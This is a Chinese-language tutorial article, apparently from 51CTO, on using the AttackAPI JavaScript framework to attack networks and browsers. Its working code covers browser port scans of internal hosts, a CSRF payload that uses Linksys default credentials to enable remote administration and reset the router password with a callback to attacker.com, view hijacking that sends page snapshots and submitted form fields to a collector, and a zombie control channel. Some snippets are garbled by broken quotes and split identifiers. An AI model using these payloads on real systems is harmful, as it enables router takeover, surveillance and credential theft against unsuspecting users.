精通JavaScript攻击框架:AttackAPI详细做法

原创
安全 应用安全
能从客户端提取信息只是攻击者能够做的事情中的一小部分而已。客户端调查只是有预谋的攻击的一个起点。XSS攻击不仅仅关于客户端安全。由于浏览器是在不安全的因特网和局域网之间的桥梁,因此攻击者可以滥用不同的浏览器特性来定位和攻击内部设备。

【51CTO.com 独家特稿】多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。

一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测试过程。虽然供应厂商最初主要将精力放在AJAX审计工具方面,但是安全研究人员更关注的是连绵的系统边界,以探索事实真相。由于存在多种可能的攻击矢量,Web应用程序安全社区也建立了多个框架来探测、利用安全漏洞,从而揭示Web开发社区所面临的种种问题。

我们在上篇向大家介绍了AttackAPI测试环境的搭设以及客户端踩点的方法进行了详尽的介绍,在本文中我们将对AttackAPI的其他用法做详尽的介绍。

一、攻击网络

能从客户端提取信息只是攻击者能够做的事情中的一小部分而已。客户端调查只是有预谋的攻击的一个起点。XSS攻击不仅仅关于客户端安全。由于浏览器是在不安全的因特网和局域网之间的桥梁,因此攻击者可以滥用不同的浏览器特性来定位和攻击内部设备。

下面考察一下如何在AttackAPI的帮助下对内部网发动攻击。就像任何有计划的网络攻击一样,我们将要进行端口扫描:

$A.scanPorts({
target: 'www.gnucitizen.org',
ports: [80,81,443],
onfound: function (port) {
console.log(port)
},
oncompleted: function () {
console.log('completed!')
}
});

图1

图1展示了端口扫描结果,这是从我们的浏览器看到的。您可以看到浏览器正确的识别出端口80已经打开,而端口81和443被关闭了。

从浏览器进行端口扫描不是很精确,因此,您可能会收到许多误报。要消除误报,需要通过timeout参数对扫描过程进行调优,如下所示:

$A.scanPorts({
target: ‘www.gnucitizen.org’,
ports: [80,81,443],
timeout: 2000, // try with a couple of values to get better results
onfound: function (port) {
console.log(port)
},
oncompleted: function () {
console.log(‘completed!’)
}
});

现在,我们已经知道如何进行端口扫描了,那么您现在就可以尝试通过类似于下列的东西来识别企业打印机已经打开了哪些端口:

$A.scanPorts({
target: ‘10.10.128.54’, // address to the internal printer IP address
ports: [80, 81, 443, 9100],
onfound: function (port) {
console.log(port)
},
oncompleted: function () {
console.log(‘completed!’)
}
});

参数timeout定义了端口扫描程序等待当前受测端口响应的时间长度,超过该段时间就将其标识为已关闭。如果受害者通过代理访问内部Web资源的话,那么就扫描过程就会失败。然而,这种设置非常罕见。

注意:Firefox和Opera不能扫描低于80的端口号。这是这两个浏览器实现的一个安全特性,但是IE没有这种限制。AttackAPI还能对一个网络范围内的端口进行扫描。这种技术就是平常所说的地毯式端口扫描,还可以通过AttackAPI的sweepPorts函数进行访问。以下代码演示了sweepPorts函数的能力:

$A.sweepPorts({
network: '212.211.193.100 - 212.211.193.110',
onfound: function (port) {
console.log(port)
},
oncompleted: function () {
console.log('completed!')
}
});
如果一切正常,您将看到如图2所示的结果。

图2

AttackAPI支持两种表示地址范围的方法,一种是“起始IP地址-终止IP地址”表示的地址范围,另一种是IP/MASK[无类域间路由(CIDR)]表示的地址范围。在这方面,可以使用以下代码扫描11.11.66.0的C类地址范围:

$A.sweepPorts({
network: ‘10.10.56.0/24’,
onfound: function (port) {
console.log(port)
},
oncompleted: function () {
console.log(‘completed!’)
}
});

为了操纵您自己的网络和IP,可以使用一些AttackAPI实用程序,这些实用程序的名称和用法概述如下:

var num = $A.ip2number(‘10.10.56.10’); // convert IP to number
console.log(num)
var ip = $A.number2ip(num); // effectively 168441866 is the same as 10.10.56.10
console.log(ip);
var range = $A.net2range(‘10.10.56.0/24’); // convert network to range
console.dir(range);
var net = $A.range2net(range); // reverse
console.log(net);

虽然识别出开放端口和工作的系统很重要,但是我们所能做的远不止这些。例如,我们可以通过单个函数调用就能够对内部路由器发动攻击。

有大量的设备可以用来了解如何通往因特网。第一个设备是著名的缺省网关。如果您是无线用户,它就是您的无线路由器。为了便于对这个路由器进行配置和安全设置,有时候允许通过因特网使用它的管理接口。下面是攻击者悄悄地完成此任务的方法,只要受害者访问一个恶意web页面就足够了:

$A.requestCSRF({
method: ‘POST’
url: (‘http://admin:admin@’+ $A.getInternalIP() ).replace(/.\d+$/, ‘.1’) +
‘/setup.cgi’,
query: {
remote_management: ‘enable’,
sysPasswd: ‘abc123’,
sysConfi rmPasswd: ‘abc123’
}
});

首先,我们调用requestCSRF函数,它是AttackAPI众多请求函数中的一个,可以用于检索或者调用远程资源。与requestXML(它只对同源的资源有效)不同的是,requestCSRF无此限制,但是它对于调用者来说总是不可见的。这意味着,我们不能获得返回的响应。

RequestCSRF函数被调用时可以带有一些参数,第一个参数是定义发送方式,这里是POST。 然后,定义发送有效载荷的URL。注意,我们检测客户端的本地IP地址,然后通过前面所讲解的方法将其转换成默认网关地址。然后,我们添加路由器的默认证书。

无线用户经常让他们的路由器保持默认的访问设置。当requestCSRF函数结束时,我们声明要发送的实际有效载荷,这个是参数query。从查询列表我们可以看到,远程管理接口程序已经启用,并且系统口令被设为“abc123”。

注意:这个函数使用了Linksys的无线路由器的默认证书。如果该路由器已经配置了其它的证书,它会为受害者提供一个基本认证框,表示在批准该请求前需要对他们进行身份验证。记住,受害者不会知道在后台发生了什么。它只是看起来连接已经终止,并且路由器试图恢复控制——很多时候都会遇到这种情况——这也正是受害者乐意键入他们的证书并且批准该恶意请求的原因。

攻击对用户来说总是不可见的。如果认证得手,端口8080就会启用,这样就可以通过因特网来使用其管理接口了。这时,边界路由器以及所有该网络中的机器都已经完全落入攻击者手中。

攻击者可能想要做的事情是发送一个配置消息,指出该用户的路由器已经被攻陷了,如下所示:

$A.requestCSRF({
method: ‘POST’
url: (‘http://admin:admin@’+ $A.getInternalIP() ).replace(/.\d+$/, ‘.1’) +
‘/setup.cgi’,
query: {
remote_management: ‘enable’,
sysPasswd: ‘abc123’,
sysConfi rmPasswd: ‘abc123’
},
onload: function () {
$A.requestIMG(‘http://attacker.com/confi rm_compromised.php’);
}
});

下面是一个真实的攻击,并且会对Linksys的无线路由器造成损害。一旦攻击者潜入您所在的网络,他们就能够做其他的事情,例如识别不同的本地设备,并尽可能地收集更多的信息。所以用户不应该信赖来自任意页面的JavaScript代码,同时他们应该意识到在没有保护的情况下冲浪所潜在的问题。

在前面部分,我们展示了经过scanStates函数可以发现已经登录的用户。然而,这个函数还有许多其他用途。由于scanStates基于特征码,因此我们可以使用它检测不同的网络设备的类型和版本。特征码是基于远程访问资源时包含一个脚本标签所引起的错误信息的,例如一个不存在的资源导致的错误跟一个由存在的资源所导致的错误是有区别的,这意味着,提供一个足够大的特征数据库,我们就可以检测不同的网络设备、企业网站等等的类型和版本。攻击者能够成功的识别出您的机构的内部网密钥体制的版本。如果其中有一些具有XSS或者CSRF漏洞,那么攻击者就可以针对性的发动攻击,从而取得受害者的会话的永久性的或者非永久性的控制权。

浏览器是有敌意的因特网和本地可信网络这两个世界间的一个沟通平台,这使它成为攻击者穿越两个世界的理想平台。在下列部分,我们将展示进入某人的路由器是多么的简单,已及攻击者是怎样轻松通过控制其它的设备来破坏网络的完整性的。

#p#

二、劫持浏览器

XSS攻击的主要类型有两种,持久性和非持久性攻击。这里所说的持久性攻击更加危险,因为用户每次访问被感染的资源时攻击都会发生。这意味着,攻击者可以在很长一段时间内控制着用户的浏览器。

相反,非持久性XSS向量只发生在单个资源上,并且用户一旦离开被感染的页面,控制就会丢失。这意味着,攻击者只能对他们发动一次攻击。

之前我们曾提到,攻击者可以设置一个陷阱,以便获得对用户长时间的非持久性的控制。通过AttackAPI提供的一些劫持技术,我们就能达到该目的。下面考察一下如何通过该程序库来获得对受害者的浏览器的持久性但是非稳定的控制。

在AttackAPI的firtest-interative.htm页面中输入下列命令:

$A.hijackView({url:‘http://www.google.com’});
几秒钟后,应该可以得到如图3所示的结果。

图3

如果一切正常,应该可以看到Google的首页。您可能认为我们已经被重定向到Google,然而请注意地址栏并没有任何变化。这意味着,虽然看到的是另一番景象,但实际上我们仍然位于firtest-interative.htm这个页面中。可尝试浏览Google,并进行一些搜索。注意,地址栏从来都不会发生任何的变化。很明显,浏览器的视窗被一个非常短的URLs所劫持了。

因为,我们所看到的内容跟地址栏中的URL毫不相干。这里的hijackView函数大部分时候都能得手。另一方面,这种技术可以是成功施加到Kiosk模式的终端机。由于Kiosk 浏览器没有提供地址栏,因此一旦攻击者找到注入并执行JavaScript的方法,他们就可以获得一个几乎永久性的控制。

由于浏览器具有同源策略限制,因此虽然可以劫持视图,但是却不能读取或者操纵它的内容,除非满足同源策略的要求。在这方面,劫持了来自myspace.com 的用户的攻击者无法读取这些用户在google.com上的内容。记住,攻击者仍然能控制用户的浏览器视图。当被劫持的用户位于攻击启动域相同的域内时,攻击者可以发动大量的攻击来监视用户的活动,从而收集很敏感的信息。下面看看如何通过AttackAPI达到此目的。

对于下面的演示,我们需要对一次真实的攻击进行模拟,因此,我们将要使用AttackAPI的bookmarklet加载库函数到一个真实的页面上。您可以从www.gnucitizen.org/projects/load-AttackAPI-bookmarklet来复制AttackAPI的bookmarklet。 将该书签放在你的书签工具栏中,并来到cn.msn.com。一旦到达这里,打开Firebug控制台。现在按下该书签。AttackAPI将在几秒钟内载入。为了检测是否已经加载好,可以输入:

dir($A);

如果没有出现$A对象,请再等一会儿,并重试。清空Firebug控制台,然后输入下列命令:

$A.hijackView({
onload: function () {
try {
var hijackedDocument = $A.getDocument(this);
var query = {};
query['snapshot_' + new Date().getTime()] =
hijackedDocument.body.innerHTML;
$A.transport({url: 'http://127.0.0.1:8888/collect.php', query:
query});
} catch(e) {}
}
});

执行该语句之前,返回系统提示符并让NetCat侦听端口8888,具体做法如前所述。一切就绪后,按下Run。几秒后,将会看到当前视图是怎么替换成一个被劫持的页面的。来到cn.msn.com,同时注意你的NetCat屏幕。将会看到当前视图的一个快照。这时NetCat将关闭。重新启动它,继续冲浪。您将继续收到用户的动作快照。

当然,NetCat不是收集这种类型的信息的最佳对象。您可能需要脚本之类的东西来保存这种类型的信息。现在让我们为我们的脚本添加更多的功能。利用下列表达式,我们就能够监视所有用户发来的页面和表单:

$A.hijackView({
onload: function () {
try {
var hijackedDocument = $A.getDocument(this);
var query = {};
query[‘snapshot_’ + new Date().getTime()] =
hijackedDocument.body.innerHTML;
$A.transport({url: ‘http://127.0.0.1:8888/collect.php’,
query: query});
for (var form in doc.forms)
$A.hijackForm({form: form, onsubmit: function () {
var fi elds = {};
for (var fi eld in this.fi elds)
fi elds[fi eld] = this.fi elds[fi eld];
var query = {};
query[‘form_’ + new Date().getTime()] =
$A.buildQuery(fi elds);
$A.transport({url: ‘http://127.0.0.1:8888/
collect.php’, query: query});
}});
} catch(e) {}
}
});

这个语句会产生一个恶意脚本,以监视受害者的一举一动。您可能已经想到如果一个银行或者电子商务站点上有一个XSS矢量时,类似的脚本会带来多么严重的后果。

#p#

三、傀儡机器的控制

AttackAPI不仅提供了便于监视受害者的活动、收集受害者的敏感信息并且攻击他们的内部网络的机制,它提供的机制还很多,例如,我们还能够控制他们的用户体验。

AttackAPI程序包具有一个专门的目录,称为inf ,它用来存放所有基础设施档案。到目前为止,该目录中仅有一个文件即channel.php。AttackAPI的channel.php文件是一个PHP脚本,用以建立和管理在攻击者和他们的受害者之间的双向通信。

您可以扩展这个脚本,比如通过添加自己的后端来储藏和操纵受害者的会话等,但是这不是本文的讨论主题。要了解更多信息,请访问AttackAPI项目页面:www.gnucitizen.org/projects/AttackAPI。为了使用channel.php,我们必须把它放在一个支持PHP4或更高版本的主机上。同样,可以使用AppServ来达到此目的。

从firetest-interactive.htm页面中打开Firebug控制台,并输入下列命令(将localhost改成存放channel.php文件的服务器的地址):
$A.zombiefy(‘http://localhost/channel.php’);
如果channel.php脚本位于localhost上,上面这行命令会把当前浏览器挂到一个攻击信道。现在打开另一个浏览器,并在其地址栏输入下列URL:
http://localhost/channel.php?action=push&message=alert(‘Hello!’)
不一会儿,将会看到一个警告信息框出现在傀儡机浏览器上,说“Hello!”。这意味着,今后攻击者可以向受害者发送命令,只要是他们在傀儡控制技术的作用范围内。俘虏一个客户端非常简单,但是要控制傀儡机就需要一些技巧了。AttackAPI提供了一些函数,专门解决这些麻烦事。您可以通过生成一个信道接口来很轻松地控制傀儡机:

var channel = $A.spawnChannel(‘http://localhost/channel.php’);
channel.push(‘alert(“Hi There!”)’);
channel.onenum = function (data) {
console.log(data);
}
channel.enum();

这段代码用具体例子说明了一个新的信道,它指向http://localhost/channel.php。可以使用下面的命令发送一个警告信息框:在脚本末尾处,我们将一个函数连到onenum处理程序上,并发出enum命令,这条命令将列出所有可用的客户端,及其环境设置。

#p#

四、小结

多年来客户端安全一直未引起人们的足够重视,但是如今情况发生了急剧转变,客户端安全已经成为信息安全领域的焦点之一。Web恶意软件、AJAX蠕虫、浏览历史暴破、登录检测、傀儡控制技术网络端口扫描以及浏览器劫持等各种技术只是安全研究人员地下实验室的部分技术,但是已经带来了非常大的影响。

一种类型的安全专业浮现并变成主流利用机制时,供应厂商和个人就会开始发行框架和自动工具,来处理工具和测试过程。虽然供应厂商最初主要将精力放在AJAX审计工具方面,但是安全研究人员更关注的是连绵的系统边界,以探索事实真相。由于存在多种可能的攻击矢量,Web应用程序安全社区也建立了多个框架来探测、利用安全漏洞,从而揭示Web 开发社区所面临的种种问题。

我们在上篇向大家介绍了AttackAPI测试环境的搭设以及客户端踩点的方法进行了详尽的介绍,在本文中我们将对AttackAPI的其他用法做详尽的介绍,即利用它攻击网络、控制浏览器以及控制傀儡机。希望本文对读者的安全测试工作能够有所帮助。

【51CTO.COM 独家特稿,转载请注明出处及作者!】

【编辑推荐】

  1. 黑客如何利用Javascript逃避检测入侵台式电脑
  2. Adobe Acrobat和Reader被找出Javascript漏洞
  3. 分析ARP病毒是如何利用的Javascript技术的

责任编辑:王文文 来源: 51CTO.com
相关推荐

2009-02-12 17:05:21

2010-01-07 13:17:35

JSON变量

2019-08-01 10:44:23

JavaScript框架内存

2019-09-29 15:30:58

JavaScript框架V8

2022-04-08 09:35:36

JavaScript代码

2009-06-08 16:45:00

精通StrutsTiles

2022-01-07 23:00:49

JavaScript安全工具

2009-06-19 14:49:43

Spring框架

2021-04-07 09:52:46

JavaScript函数劫持攻击

2021-01-13 11:25:12

JavaScript闭包函数

2021-04-01 10:16:01

EmacsJavaScript elisp

2010-09-29 15:00:35

2010-09-16 11:05:43

2023-10-09 07:57:14

JavaJCF

2009-09-29 10:00:40

Spring AOP框

2010-09-16 11:13:02

2011-07-13 09:46:23

javaScript

2022-02-09 11:02:16

JavaScript前端框架

2021-10-17 22:40:51

JavaScript开发 框架

2010-09-30 10:01:38

点赞
收藏

51CTO技术栈公众号